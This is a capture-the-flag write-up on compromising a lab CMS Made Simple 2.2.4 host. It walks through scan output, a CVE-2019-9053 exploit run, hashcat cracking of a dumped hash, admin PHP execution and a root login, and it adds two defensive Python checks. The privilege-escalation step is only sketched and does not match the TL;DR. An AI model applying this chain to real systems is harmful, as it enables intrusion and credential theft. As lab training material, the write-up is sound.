TL;DR
- We found a CMSMadeSimple v2.2.4 instance
- Using https://www.exploit-db.com/exploits/46635 we retrieved a user's credentials (password hash and salt)
- We cracked that hash and logged into the admin section
- Using the “user defined tags” we were able to run PHP and gain remote access as david
- Looking into /etc/passwd we found a password hash for root
- Using hashcat we then cracked the password and escalated our access to root
NETWORK
sudo nmap -sCVS 172.31.1.2 -p22,80 --script=discovery
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:34 EST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for 172.31.1.2
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
| ssh2-enum-algos:
| kex_algorithms: (10)
| server_host_key_algorithms: (5)
| encryption_algorithms: (6)
| mac_algorithms: (10)
|_ compression_algorithms: (2)
| ssh-hostkey:
| 2048 9b:f9:a1:47:41:5f:d4:5c:97:33:55:26:ce:43:8f:2e (RSA)
| 256 40:68:53:3d:c0:3a:dc:ce:67:21:5b:68:33:68:04:83 (ECDSA)
|_ 256 12:13:a9:6f:66:ba:78:de:0a:9e:2f:ad:90:02:4e:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-headers:
| Date: Tue, 08 Mar 2022 00:34:26 GMT
| Server: Apache/2.4.29 (Ubuntu)
| Set-Cookie: CMSSESSIDfea4606480fb=gv1gf23pqmt9ac23d7fnmatkd4; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|
|_ (Request type: HEAD)
| http-vhosts:
|_128 names had status 200
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /admin/
| php: 1
| /tmp/cache/
| css: 2
| /uploads/simplex/js/
| js: 1
| /uploads/simplex/teaser/
| png: 2
| Longest directory structure:
| Depth: 3
| Dir: /uploads/simplex/js/
| Total files found (by extension):
|_ Other: 1; css: 2; js: 1; php: 2; png: 2
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
|_ http://css3-mediaqueries-js.googlecode.com:80/svn/trunk/css3-mediaqueries.js
|_http-mobileversion-checker: No mobile version detected.
|_http-feed: Couldn't find any feeds.
| http-enum:
| /admin/login.php: Possible admin folder
| /doc/: Potentially interesting folder
| /lib/: Potentially interesting folder
| /modules/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /tmp/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /uploads/: Potentially interesting folder
|_http-chrono: Request times for /; avg: 215.49ms; min: 189.44ms; max: 230.96ms
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=172.31.1.2
| Found the following error pages:
|
| Error Code: 400
| http://172.31.1.2:80
|
| Error Code: 404
|_ http://172.31.1.2:80/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=Simplex%20News%20Detail&cntnt01returnid=1
|_http-title: Home - Simple
|_http-xssed: No previously reported XSS vuln.
|_http-date: Tue, 08 Mar 2022 00:34:22 GMT; 0s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.31.1.2
| url method
|_ http://172.31.1.2:80/admin/login.php FORM
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ipidseq: ERROR: Script execution failed (use -d to debug)
| qscan:
| PORT FAMILY MEAN (us) STDDEV LOSS (%)
| 22 0 16550.00 3530.46 0.0%
|_80 0 16918.20 4332.26 0.0%
|_dns-brute: Can't guess domain of "172.31.1.2"; use dns-brute.domain script argument.
|_path-mtu: PMTU == 1500
|_fcrdns: FAIL (No PTR record)
ENUMERATION
The scan revealed a CMSMadeSimple application on port 80.
We ran some common scans, which revealed the following information:
whatweb http://$IP
http://172.31.1.2 [200 OK] Apache[2.4.29], CMS-Made-Simple[2.2.4], Cookies[CMSSESSIDfea4606480fb], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[172.31.1.2], JQuery[1.11.1], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.], Script[text/javascript], Title[Home - Simple]
Exploit
https://www.exploit-db.com/exploits/46635
CVE-2019-9053
Running this exploit we found some interesting information:
python 46635.py -u http://172.31.1.2
cat hash
bbeabbca0fff4e851f840ffad0680dcf:18207a2929431d9f
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt --show
bbeabbca0fff4e851f840ffad0680dcf:18207a2929431d9f:punisher
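The hash:salt pair dumped by the exploit is CMS Made Simple's md5(salt + password) scheme, which is why hashcat mode 20 (md5($salt.$pass)) is the right mode. The following script is an added example, not part of the original write-up or of the exploit: it parses a hashcat --show line and recomputes the hash to confirm the recovered plaintext really reproduces the dumped digest, which is a cheap sanity check before reusing a cracked credential.

```python
import hashlib

# CMS Made Simple stores user passwords as md5(salt + password) and the
# exploit dumps them as "hash:salt"; hashcat -m 20 computes md5($salt.$pass).


def cmsms_salted_md5(salt: str, password: str) -> str:
    """Recompute the CMSMS password hash the same way hashcat -m 20 does."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def parse_show_line(line: str) -> tuple:
    """Split a 'hash:salt:plaintext' line as printed by hashcat --show."""
    # maxsplit=2 keeps any ':' that happens to be part of the plaintext
    digest, salt, plain = line.strip().split(":", 2)
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest.lower()):
        raise ValueError(f"not an MD5 digest: {digest!r}")
    return digest.lower(), salt, plain


def verify_show_line(line: str) -> bool:
    """Return True when the plaintext reproduces the dumped hash for that salt."""
    digest, salt, plain = parse_show_line(line)
    return cmsms_salted_md5(salt, plain) == digest


if __name__ == "__main__":
    # The hash:salt:plaintext line from the write-up above.
    line = "bbeabbca0fff4e851f840ffad0680dcf:18207a2929431d9f:punisher"
    print("hashcat result verified:", verify_show_line(line))
```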
Using the recovered credentials david/punisher we are in.
Using the “User Defined Tags” feature of CMSMadeSimple, we can run PHP code on any page.
PRIV ESCALATION
Using this new credential rooot/AAAA we got into the root account.
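The escalation relied on a password hash sitting directly in /etc/passwd, which is world-readable, instead of in /etc/shadow. The audit below is an added example and not part of the write-up; it flags passwd entries whose password field holds a hash or is empty, and any extra UID 0 account. The sample file is constructed, and it assumes the extra account was a UID 0 entry carrying its hash in field 2, which the write-up itself does not state.

```python
# Constructed /etc/passwd excerpt modelled on the write-up (not the real file);
# the "rooot" line is an assumed example of a hash stored in the password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
david:x:1000:1000:david:/home/david:/bin/bash
rooot:$6$PLACEHOLDER$notarealhash:0:0::/root:/bin/bash
"""

# Field-2 values that carry no secret: "x" means shadowed, the rest mean locked.
NO_SECRET = ("x", "*", "!", "!!")


def audit_passwd(text: str) -> list:
    """Return (account, issue) findings for the given /etc/passwd contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field (login without password)"))
        elif pw not in NO_SECRET:
            findings.append((user, "password hash stored in world-readable /etc/passwd"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {issue}")
```

On a live host, feed it the real file with `audit_passwd(open("/etc/passwd").read())`.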
CAPTURE FLAGS
root@simple:/home/david# find / '(' -name 'access.txt' -or -name 'system.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null
33 /home/david/access.txt
dbe6218bdc74df7e7529dd4641629bb5
33 /root/system.txt
c20f32787812a86c23e91fd0a0c069a1